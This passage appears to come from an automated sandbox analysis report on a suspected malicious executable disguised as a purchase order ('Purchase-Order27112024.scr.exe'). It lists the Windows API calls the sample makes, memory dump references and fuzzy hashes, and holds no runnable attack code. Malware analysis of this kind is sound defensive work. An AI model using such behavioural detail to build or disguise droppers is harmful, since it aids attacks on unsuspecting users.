                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                      • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                                                      • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                      • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,000000F8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 849931509-0
                                                                                                      • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                                                      • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                                                      • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                                                                      • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1136574915-0
                                                                                                      • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                      • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                                                      • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                      • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCreate
                                                                                                      • String ID:
                                                                                                      • API String ID: 415043291-0
                                                                                                      • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                      • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                      • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                      • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointerwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 327478801-0
                                                                                                      • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                                                      • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                                                                      • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                                                                      • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 390214022-0
                                                                                                      • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                      • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                      • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                      • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                      APIs
                                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PathSearch
                                                                                                      • String ID:
                                                                                                      • API String ID: 2203818243-0
                                                                                                      • Opcode ID: 617a12e61fb4324aa246364927c77d6377e7495a27636ef24a8cd76bd72a4227
                                                                                                      • Instruction ID: b3e0bc928fe15a286efade0c4fd5f6c5c16538b609349815db9c46a815cf95c6
                                                                                                      • Opcode Fuzzy Hash: 617a12e61fb4324aa246364927c77d6377e7495a27636ef24a8cd76bd72a4227
                                                                                                      • Instruction Fuzzy Hash: 09E04FB2314200AAD710DFA5DE48EEA77ACDB0036CF30467AE611A61D0E2B49A41973D
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                      • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                      • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID:
                                                                                                      • API String ID: 1096422788-0
                                                                                                      • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                      • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                      • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                      • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                      • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                      • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
• Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
• Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
• Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
APIs
• SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
• Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
• Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
• Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
• Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
• Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
• Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404B86
• GetDlgItem.USER32(?,00000408), ref: 00404B91
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
• LoadBitmapW.USER32(0000006E), ref: 00404BEE
• SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
• SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
• DeleteObject.GDI32(00000000), ref: 00404C64
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
• GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
• ShowWindow.USER32(?,00000005), ref: 00404DBE
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
• ImageList_Destroy.COMCTL32(?), ref: 00404F8E
• GlobalFree.KERNEL32(?), ref: 00404F9E
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
• SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
• InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
• ShowWindow.USER32(?,00000000), ref: 0040513D
• GetDlgItem.USER32(?,000003FE), ref: 00405148
• ShowWindow.USER32(00000000), ref: 0040514F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
